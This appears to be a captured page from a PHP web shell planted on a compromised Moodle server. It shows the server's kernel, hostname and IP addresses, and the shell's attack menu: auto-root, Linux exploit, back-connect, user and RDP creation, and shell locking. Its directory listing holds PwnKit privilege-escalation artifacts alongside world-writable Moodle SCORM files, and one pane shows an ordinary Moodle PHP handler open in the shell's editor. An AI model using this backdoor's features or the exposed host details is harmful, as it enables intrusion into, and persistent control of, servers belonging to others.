Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
mod /
scorm /
datamodels /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
aicc.js
28.83
KB
-rwxrwxrwx
aicc.php
2.96
KB
-rwxrwxrwx
aicclib.php
21.77
KB
-rwxrwxrwx
debug.js.php
34.99
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
scorm_12.js
33.9
KB
-rwxrwxrwx
scorm_12.php
3.02
KB
-rwxrwxrwx
scorm_12lib.php
4.34
KB
-rwxrwxrwx
scorm_13.js
71.85
KB
-rwxrwxrwx
scorm_13.php
3.03
KB
-rwxrwxrwx
scorm_13lib.php
53.24
KB
-rwxrwxrwx
scormlib.php
53.05
KB
-rwxrwxrwx
sequencinghandler.php
2.75
KB
-rwxrwxrwx
sequencinglib.php
41.24
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sequencinghandler.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. require_once('../../../config.php'); require_once($CFG->dirroot.'/mod/scorm/locallib.php'); $id = optional_param('id', '', PARAM_INT); // Course Module ID, or $a = optional_param('a', '', PARAM_INT); // scorm ID. $scoid = required_param('scoid', PARAM_INT); // Sco ID. $attempt = required_param('attempt', PARAM_INT); // Attempt number. $function = required_param('function', PARAM_RAW); // Function to call. $request = optional_param('request', '', PARAM_RAW); // Scorm ID. if (!empty($id)) { $cm = get_coursemodule_from_id('scorm', $id, 0, false, MUST_EXIST); $course = $DB->get_record("course", array("id" => $cm->course), '*', MUST_EXIST); $scorm = $DB->get_record("scorm", array("id" => $cm->instance), '*', MUST_EXIST); } else if (!empty($a)) { $scorm = $DB->get_record("scorm", array("id" => $a), '*', MUST_EXIST); $course = $DB->get_record("course", array("id" => $scorm->course), '*', MUST_EXIST); $cm = get_coursemodule_from_instance("scorm", $scorm->id, $course->id, false, MUST_EXIST); } else { print_error('missingparameter'); } $PAGE->set_url('/mod/scorm/datamodels/sequencinghandler.php', array('scoid' => $scoid, 'attempt' => $attempt, 'id' => $cm->id, 'function' => $function, 'request' => $request)); require_login($course, false, $cm); if (!empty($scoid) && !empty($function)) { require_once($CFG->dirroot.'/mod/scorm/datamodels/scorm_13lib.php'); if (has_capability('mod/scorm:savetrack', context_module::instance($cm->id))) { $result = null; switch ($function) { case 'scorm_seq_flow' : if ($request == 'forward' || $request == 'backward') { $seq = scorm_seq_navigation ($scoid, $USER->id, $request.'_', $attempt); $sco = scorm_get_sco($scoid); $seq = scorm_seq_flow($sco, $request, $seq, true, $USER->id); if (!empty($seq->nextactivity)) { scorm_seq_end_attempt($sco, $USER->id, $seq); } } echo json_encode($seq); break; } } }
Close